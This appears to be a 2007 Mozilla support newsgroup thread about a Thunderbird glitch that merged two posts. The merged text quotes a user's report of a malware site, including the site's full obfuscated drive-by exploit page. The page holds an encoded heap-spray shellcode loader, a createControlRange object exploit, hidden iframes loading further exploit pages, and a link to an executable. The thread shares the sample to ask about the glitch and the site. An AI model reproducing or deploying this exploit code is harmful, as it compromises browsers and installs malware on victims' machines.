Strange mix-up in Thunderbird
"Andrés M."
This morning I opened Thunderbird and went to the m.s.firefox newsgroup.
I clicked first on the mail with subject "Could this exploit code from a
malware site affect Firefox?" and while the mail window was blank and
still loading I immediately clicked on the mail with subject "Really
really really annoying and persistent display problem...". Almost
instantly the latter mail was on screen. Then clicked on the Back button
to see the first mail and what I got was a mix of the first half of the
first mail with the full content of the second mail (including header)
appended below. The resulting content is pasted at the end of this mail.
The header of the second mail may be a little different, I copied it
manually from an exported text file of the second mail. Look for the
word "unescaping" to reach the point where both mails got mixed.
I am unable to reproduce this strange event again, but it definitely
happened so I wonder if someone can take a look at it.
Andrés
-------------------------------------------------------------------------
Hello, I've accidentally entered a malware site by following an e-mail link
to www.duhymn.hk (be careful NOT to enter that site with a browser).
When I entered the site with Firefox 2.0.0.4, the browser immediately froze,
so I had to manually terminate it with the Task Manager (Windows XP).
Then I thought that it could to be a malware site, so I tried to download
its main page outside any browser to avoid executing it again.
I got the following code from the "index.htm" page:
___
<html>
<body>
<script>
document.write(unescape("%3c%73%63%72%69%70%74%3e%0a%74%72%79%7b%78%3d%75%6e%65%73%63%61
%70%65%28%22%25%75%39%30%39%30%25%75%39%30%39%30%25%75%39%30%39%30%25%75%39%30%39%30%25
%75%30%30%65%38%25%75%30%30%30%30%25%75%35%64%30%30%25%75%65%64%38%31%25%75%31%31%63%65
%25%75%30%30%34%30%25%75%63%63%65%38%25%75%30%30%30%30%25%75%38%64%30%30%25%75%35%65%38
%35%25%75%34%30%31%32%25%75%65%38%30%30%25%75%30%30%30%37%25%75%30%30%30%30%25%75%37%32
%37%35%25%75%36%64%36%63%25%75%36%65%36%66%25%75%65%38%30%30%25%75%30%31%31%65%25%75%30
%30%30%30%25%75%63%33%38%39%25%75%38%35%38%64%25%75%31%33%31%65%25%75%30%30%34%30%25%75
%31%33%65%38%25%75%30%30%30%30%25%75%35%35%30%30%25%75%34%63%35%32%25%75%36%66%34%34%25
%75%36%65%37%37%25%75%36%66%36%63%25%75%36%34%36%31%25%75%36%66%35%34%25%75%36%39%34%36
%25%75%36%35%36%63%25%75%30%30%34%31%25%75%65%38%35%33%25%75%30%30%66%38%25%75%30%30%30
%30%25%75%39%30%39%30%25%75%38%64%38%64%25%75%31%32%37%66%25%75%30%30%34%30%25%75%30%30
%36%61%25%75%30%30%36%61%25%75%30%39%65%38%25%75%30%30%30%30%25%75%36%33%30%30%25%75%35
%63%33%61%25%75%32%65%37%34%25%75%36%65%36%39%25%75%30%30%37%38%25%75%36%61%35%31%25%75
%66%66%30%30%25%75%38%64%64%30%25%75%36%62%38%35%25%75%34%30%31%32%25%75%36%61%30%30%25
%75%65%38%30%30%25%75%30%30%30%39%25%75%30%30%30%30%25%75%33%61%36%33%25%75%37%34%35%63
%25%75%36%39%32%65%25%75%37%38%36%65%25%75%65%38%30%30%25%75%30%30%62%65%25%75%30%30%30
%30%25%75%38%35%38%64%25%75%31%32%37%33%25%75%30%30%34%30%25%75%30%30%36%61%25%75%62%31
%65%38%25%75%30%30%30%30%25%75%34%63%30%30%25%75%36%31%36%66%25%75%34%63%36%34%25%75%36
%32%36%39%25%75%36%31%37%32%25%75%37%39%37%32%25%75%30%30%34%31%25%75%36%39%35%37%25%75
%34%35%36%65%25%75%36%35%37%38%25%75%30%30%36%33%25%75%37%38%34%35%25%75%37%34%36%39%25
%75%37%32%35%30%25%75%36%33%36%66%25%75%37%33%36%35%25%75%30%30%37%33%25%75%37%34%36%38
%25%75%37%30%37%34%25%75%32%66%33%61%25%75%37%32%32%66%25%75%37%34%36%36%25%75%37%35%36
%38%25%75%32%65%36%34%25%75%36%66%36%33%25%75%32%66%36%64%25%75%36%31%36%64%25%75%32%65
%36%65%25%75%37%38%36%35%25%75%30%30%36%35%25%75%30%30%30%30%25%75%30%30%30%30%25%75%30
%30%30%30%25%75%30%30%30%30%25%75%30%30%30%30%25%75%30%30%30%30%25%75%36%30%30%30%25%75
%38%62%36%34%25%75%33%30%31%64%25%75%30%30%30%30%25%75%38%62%30%30%25%75%30%63%35%62%25
%75%35%62%38%62%25%75%38%62%31%63%25%75%38%62%31%62%25%75%30%38%35%62%25%75%64%61%38%39
%25%75%39%64%38%39%25%75%31%33%32%64%25%75%30%30%34%30%25%75%37%62%38%62%25%75%30%31%33
%63%25%75%30%33%64%37%25%75%37%38%35%66%25%75%34%62%38%62%25%75%38%62%31%38%25%75%32%30
%37%33%25%75%37%62%38%62%25%75%30%31%32%34%25%75%30%31%64%36%25%75%66%63%64%37%25%75%30
%31%61%64%25%75%35%31%64%30%25%75%39%36%35%37%25%75%62%64%38%64%25%75%31%33%31%65%25%75
%30%30%34%30%25%75%30%66%62%39%25%75%30%30%30%30%25%75%66%33%30%30%25%75%39%36%61%36%25
%75%35%39%35%66%25%75%30%36%37%34%25%75%34%37%34%37%25%75%65%34%65%32%25%75%63%34%65%62
%25%75%63%30%33%31%25%75%38%62%36%36%25%75%63%31%30%37%25%75%30%32%65%30%25%75%37%33%38
%62%25%75%30%31%31%63%25%75%30%31%64%36%25%75%61%64%63%36%25%75%64%30%30%31%25%75%38%35
%38%39%25%75%31%33%33%31%25%75%30%30%34%30%25%75%63%33%36%31%25%75%66%66%35%30%25%75%32
%64%62%35%25%75%34%30%31%33%25%75%66%66%30%30%25%75%33%31%39%35%25%75%34%30%31%33%25%75
%66%66%30%30%25%75%34%37%65%30%25%75%37%34%36%35%25%75%37%32%35%30%25%75%36%33%36%66%25
%75%36%34%34%31%25%75%37%32%36%34%25%75%37%33%36%35%25%75%30%30%37%33%25%75%30%30%30%30
%25%75%30%30%30%30%25%75%30%30%30%30%25%75%30%30%30%30%22%29%3b%79%3d%75%6e%65%73%63%61
%70%65%28%22%25%75%30%64%30%64%25%75%30%64%30%64%22%29%3b%77%68%69%6c%65%28%79%2e%6c%65
%6e%67%74%68%3c%30%78%34%30%30%30%30%29%79%2b%3d%79%3b%79%3d%79%2e%73%75%62%73%74%72%69
%6e%67%28%30%2c%30%78%33%66%66%65%34%2d%78%2e%6c%65%6e%67%74%68%29%3b%6f%3d%6e%65%77%20
%41%72%72%61%79%28%29%3b%66%6f%72%28%69%3d%30%3b%69%3c%34%35%30%3b%69%2b%2b%29%6f%5b%69
%5d%3d%79%2b%78%3b%7a%3d%4d%61%74%68%2e%63%65%69%6c%28%30%78%64%30%64%30%64%30%64%29%3b
%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%6f%62%6a%65%63%74%20%63%6c%61%73%73
%69%64%3d%22%43%4c%53%49%44%3a%45%43%34%34%34%43%42%36%2d%33%45%37%45%2d%34%38%36%35%2d
%42%31%43%33%2d%30%44%45%37%32%45%46%33%39%42%33%46%22%3e%3c%5c%2f%6f%62%6a%65%63%74%3e
%27%29%3b%7a%3d%64%6f%63%75%6d%65%6e%74%2e%73%63%72%69%70%74%73%5b%30%5d%2e%63%72%65%61
%74%65%43%6f%6e%74%72%6f%6c%52%61%6e%67%65%28%29%2e%6c%65%6e%67%74%68%3b%7d%63%61%74%63
%68%28%65%29%7b%7d%0a%3c%2f%73%63%72%69%70%74%3e"));
</script>
<script>
document.write(unescape("%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%65%78%70%31%2e%68%74%6d
%22%20%77%69%64%74%68%3d%22%31%22%20%68%65%69%67%68%74%3d%22%31%22%3e%3c%2f%69%66%72%61
%6d%65%3e%0a%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%65%78%70%32%2e%68%74%6d%22%20%77%69
%64%74%68%3d%22%31%22%20%68%65%69%67%68%74%3d%22%31%22%3e%3c%2f%69%66%72%61%6d%65%3e%0a
%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%65%78%70%33%2e%68%74%6d%22%20%77%69%64%74%68%3d
%22%31%22%20%68%65%69%67%68%74%3d%22%31%22%3e%3c%2f%69%66%72%61%6d%65%3e%0a%3c%73%74%79
%6c%65%3e%20%2a%20%7b%43%55%52%53%4f%52%3a%20%75%72%6c%28%22%31%32%33%2e%68%74%6d%22%29
%7d%20%3c%2f%73%74%79%6c%65%3e%0a"));
</script>
We are currently testing a new browser feature. If you are not able to
view this ecard, please <a href="/ecard.exe">click here</a> to view in
its original format.
</body>
</html>
___
The fact that the code is obfuscated like this hints that it's a malware
site. After "unescaping" both encoded lines, I got the following code:
___
Path:
border1.nntp.dca.giganews.com!nntp.giganews.com!postnews.google.com!p77g2000hsh.googlegroups.com!not-for-mail
Newsgroups:
mozilla.support.firefox
Organization:
http://groups.google.com
Lines:
18
Message-ID:
<1182746345....@p77g2000hsh.googlegroups.com>
NNTP-Posting-Host:
72.142.180.124
MIME-Version:
1.0
Content-Type:
text/plain; charset="iso-8859-1"
X-Trace:
posting.google.com 1182746346 30540 127.0.0.1 (25 Jun 2007 04:39:06 GMT)
X-Complaints-To:
groups...@google.com
NNTP-Posting-Date:
Mon, 25 Jun 2007 04:39:06 +0000 (UTC)
User-Agent:
G2/1.0
X-HTTP-UserAgent:
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.4) Gecko/20061201
Firefox/2.0.0.4 (Ubuntu-feisty),gzip(gfe),gzip(gfe)
Complaints-To:
groups...@google.com
Injection-Info:
p77g2000hsh.googlegroups.com; posting-host=72.142.180.124;
posting-account=0SOUng0AAACu7zVOKRLT1jesEMn1KjB7
Bytes:
1747
Xref:
number1.nntp.dca.giganews.com mozilla.support.firefox:58015
Im running FF2 on ubuntu and ive been struggling with a problem for a
while:
Randomly, pages will load (i.e. at the level of http) but the content
will not display. So for example I may be at one page, click a link,
see the progress bar indicate that all the data has been transferred,
but nothing happens.
It just sits there. By resizing my window the display WILL CHANGE
correctly, but only by doing that.
Please tell me someone has had this prob. This is such a pain in the
ass. I love this browser but its killing me --just killing me -- to
have to resize sometiems every flipping page load... *cries*...
*sobs*...
--lstewart
Nir
> Hello, This morning I opened Thunderbird and went to the m.s.firefox
> newsgroup. I clicked first on the mail with subject "Could this
> exploit code from a malware site affect Firefox?" and while the mail
> window was blank and still loading I immediately clicked on the mail
> with subject "Really really really annoying and persistent display
> problem...". Almost instantly the latter mail was on screen. Then
> clicked on the Back button to see the first mail and what I got was a
> mix of the first half of the first mail with the full content of the
> second mail (including header) appended below. The resulting content
> is pasted at the end of this mail. The header of the second mail may
> be a little different, I copied it manually from an exported text
> file of the second mail. Look for the word "unescaping" to reach the
> point where both mails got mixed.
>
> I am unable to reproduce this strange event again, but it definitely
> happened so I wonder if someone can take a look at it.
either an extensions is causing this -
"https://bugzilla.mozilla.org/show_bug.cgi?id=370473#c0"
or it's the theme, you are using , which is misbehaving -
"https://bugzilla.mozilla.org/show_bug.cgi?id=352694#c36"
"https://bugzilla.mozilla.org/show_bug.cgi?id=352694#c23"
"Andrés M."
Oops, sorry I forgot to mention but I'm using Thunderbird 2.0.0.4
completely clean, no extra themes and no add-ons except "Talkback" which
comes with the installer.
Thanks for your reply, but add-ons are certainly not the cause.